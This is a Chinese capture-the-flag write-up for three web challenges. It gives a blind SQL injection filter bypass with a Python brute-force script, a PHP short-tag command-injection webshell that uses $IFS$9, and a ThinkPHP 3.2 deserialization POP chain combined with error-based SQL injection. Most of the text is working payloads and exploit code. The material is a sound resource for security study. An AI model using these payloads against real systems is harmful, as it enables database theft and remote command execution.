0%

红明谷杯部分WEB write up

happysql

  • 简单fuzz发现过滤了if,空格、or,and,information,单引号,benchmark,sleep,=,li k,+,-等关键字

  • 但是双引号并未过滤。正好题目也是由双引号包裹的字符串,同时#也没有过滤可以顺利逃逸出来

    WX20210402-194839@2x

    or和and 等逻辑运算符直接用||代替即可。等于号可以使用regexp或者strcmp,而字符串分割可以使用locate代替。||只要一边执行成功就能跳转到home.php

    WX20210402-195828@2x

  • 使用基于运行错误的BOOL盲注(http://www.plasf.cn/articles/spatial_functions_blind_inject.html),例如exp(710)即可溢出报错

WX20210402-195930@2x
  • ​ if使用make_set即可可以构造如下payload:
username=a"||exp(make_set((database()/**/regexp/**/binary/**/0x637466),0x373130,0x31))#&password=
  • 如果猜测正确exp溢出导致SQL执行失败,返回Username or password error!
WX20210402-200946@2x
  • 猜测错误那么返回1,exp不溢出运行正常。
WX20210402-201021@2x
  • 由于information被过滤使用mysql.innodb_index_stats代替发现可以,前面可以猜出数据库是ctf,直接猜表名
  payload = {
  'username':'a"||exp(make_set(strcmp((locate(binary/**/%s,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name/**/regexp/**/binary/**/0x637466),%s)),%s),710,1))#'%(ord2hex(j),i,i),
  'password':''
  }

WX20210402-201424@2x

  • 猜出表名f1ag,但是innodb的方法无法猜出列名,但是可以简单测试出列名的个数为两个。

WX20210402-201712@2x

  • 直接使用无列名注入即可综合上面分析最终EXP为:
#/**/coding=utf-8
import io
import requests
import threading
def ord2hex(string):
    result = ""
    for i in string:
        r = hex(ord(i));
        r = r.replace('0x','')
        result = result+r
    return '0x'+result

tables = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-}{,_'
flag = ''
sessid = 'flag'
for i in range(1,70):
    for j in tables:
        url = "http://eci-2ze2jur5bqu7g7b1eaws.cloudeci1.ichunqiu.com/login.php"
        payload = {
        'username':'a"||exp(make_set(strcmp((locate(binary/**/%s,(select/**/group_concat(x.2)/**/from/**/(select/**/2/**/union/**/select/**/*/**/from/**/f1ag)x),%d)),%d),710,1))#'%(ord2hex(j),i,i),
        'password':''
        }
        resp = requests.post(url,data=payload)
        #print(payload['username'])
        if 'home.php' in resp.text:
            flag = flag +j
            print(flag)
            break

WX20210402-202003@2x

write_shell

  • 简单题
  • 用短标签绕过对php的过滤,$IFS$9代替空格。
?action=upload&data=<?=`ls\$IFS\$9/`?>
  • 直接得到文件列表
!whatyouwantggggggg401.php
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
  • 直接用通配符读就好了
?action=upload&data=<?=`cat\$IFS\$9/*.ph*`?>

WX20210402-202932@2x

easytp

  • 扫出源码:www.zip
  • Thinkphp3.2,home控制器存在一个反序列化方法
WX20210402-203826@2x
  • 网上找到一个POP链发现可以用https://www.jianshu.com/p/41782991b4b2

  • 报错注入读到存在一个叫tp的数据库,里面有个叫f14g的表(以为用MYSQL导出日志GETSHELL整了半天在数据库里面)

WX20210402-203648@2x

  • Exp
<?php
namespace Think\Db\Driver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true    // 开启才能读取文件
        );
        protected $config = array(
            "debug"    => 1,
            "database" => "mysql",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "123456"
        );
    }
}

namespace Think\Image\Driver{
    use Think\Session\Driver\Memcache;
    class Imagick{
        private $img;

        public function __construct(){
            $this->img = new Memcache();
        }
    }
}

namespace Think\Session\Driver{
    use Think\Model;
    class Memcache{
        protected $handle;

        public function __construct(){
            $this->handle = new Model();
        }
    }
}

namespace Think{
    use Think\Db\Driver\Mysql;
    class Model{
        protected $options   = array();
        protected $pk;
        protected $data = array();
        protected $db = null;

        public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                "table" => "mysql.user where 1=updatexml(1,concat(mid((select f14g from tp.f14g),20,70),0x7e),1);#",
                "where" => "1=1"
            );
        }
    }
}

namespace {
    echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}